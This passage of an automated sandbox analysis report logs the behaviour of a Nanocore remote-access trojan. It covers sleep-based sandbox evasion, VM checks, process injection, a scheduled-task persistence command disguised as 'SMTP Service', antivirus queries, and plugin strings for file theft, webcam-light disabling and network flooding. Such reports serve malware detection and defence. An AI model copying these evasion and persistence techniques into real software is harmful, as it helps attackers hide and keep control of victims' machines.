        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 3044Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2532Thread sleep time: -9223372036854770s >= -30000s
        Source: C:\Windows\System32\taskeng.exe TID: 1704Thread sleep time: -60000s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1532Thread sleep time: -40853s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2592Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2836Thread sleep time: -33312s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2028Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2908Thread sleep time: -42952s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2300Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 1220Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exe TID: 2624Thread sleep time: -60000s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2648Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2524Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeWindow / User API: threadDelayed 3705
        Source: C:\Users\user\AppData\Roaming\ALP.exeWindow / User API: threadDelayed 5868
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 35196
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 40853
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 33312
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 42952
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Roaming\ALP.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: ALP.exe, 00000004.00000003.483036417.000000000057D000.00000004.00000001.sdmpBinary or memory string: HVVmcicda.dll
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: ALP.exe, 00000004.00000003.483027853.00000000005A1000.00000004.00000001.sdmpBinary or memory string: @XVmcicda.dll+
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: smtpsvc.exe, 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess token adjusted: Debug
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess token adjusted: Debug
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory written: C:\Users\user\AppData\Roaming\ALP.exe base: 400000 value starts with: 4D5A
        Source: C:\Users\user\AppData\Roaming\ALP.exeMemory written: C:\Users\user\AppData\Roaming\ALP.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeMemory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe 0
        Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
        Source: C:\Users\user\AppData\Roaming\ALP.exeProcess created: C:\Users\user\AppData\Roaming\ALP.exe C:\Users\user\AppData\Roaming\ALP.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe
        Source: ALP.exe, 00000004.00000002.695614062.0000000005DDD000.00000004.00000001.sdmpBinary or memory string: #rProgram Manager
        Source: ALP.exe, 00000004.00000002.693961530.000000000297E000.00000004.00000001.sdmpBinary or memory string: Program Manager48
        Source: ALP.exe, 00000004.00000002.693961530.000000000297E000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: ALP.exe, 00000004.00000002.691270418.0000000000CD0000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690283366.0000000000870000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
        Source: ALP.exe, 00000004.00000002.692454120.0000000002714000.00000004.00000001.sdmpBinary or memory string: Program Manager +
        Source: ALP.exe, 00000004.00000002.691270418.0000000000CD0000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690283366.0000000000870000.00000002.00020000.sdmpBinary or memory string: !Progman
        Source: ALP.exe, 00000004.00000002.693961530.000000000297E000.00000004.00000001.sdmpBinary or memory string: Program Manager4
        Source: ALP.exe, 00000004.00000002.691270418.0000000000CD0000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.690283366.0000000000870000.00000002.00020000.sdmpBinary or memory string: Program Manager<
        Source: ALP.exe, 00000004.00000002.693438850.00000000028B0000.00000004.00000001.sdmpBinary or memory string: Program Manager@
        Source: C:\Users\user\AppData\Roaming\ALP.exeQueries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exeQueries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exeQueries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exeQueries volume information: C:\Users\user\AppData\Roaming\ALP.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Users\user\AppData\Roaming\ALP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\Users\user\AppData\Roaming\ALP.exeCode function: 4_2_0072F238 GetSystemTimes,
        Source: C:\Users\user\AppData\Roaming\ALP.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\ALP.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.3320184.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.3590184.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 16.2.smtpsvc.exe.35947ad.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.32847ad.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.34847ad.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.smtpsvc.exe.3280184.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.ALP.exe.331b34e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.6c4629.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.smtpsvc.exe.3338cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.347b34e.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.smtpsvc.exe.3298cc8.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.ALP.exe.3480184.24.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.ALP.exe.34f8cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.ALP.exe.3318cc8.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000000E.00000002.523014987.00000000032D9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528139712.0000000002231000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522978296.00000000022D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525259528.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.525186411.0000000002541000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.528229678.0000000003239000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.522489862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.527221961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.524484369.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 1212, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: ALP.exe PID: 2700, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 2196, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: smtpsvc.exe PID: 344, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: ALP.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: ALP.exe, 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
        Source: ALP.exe, 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
        Source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
        Source: ALP.exe, 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenew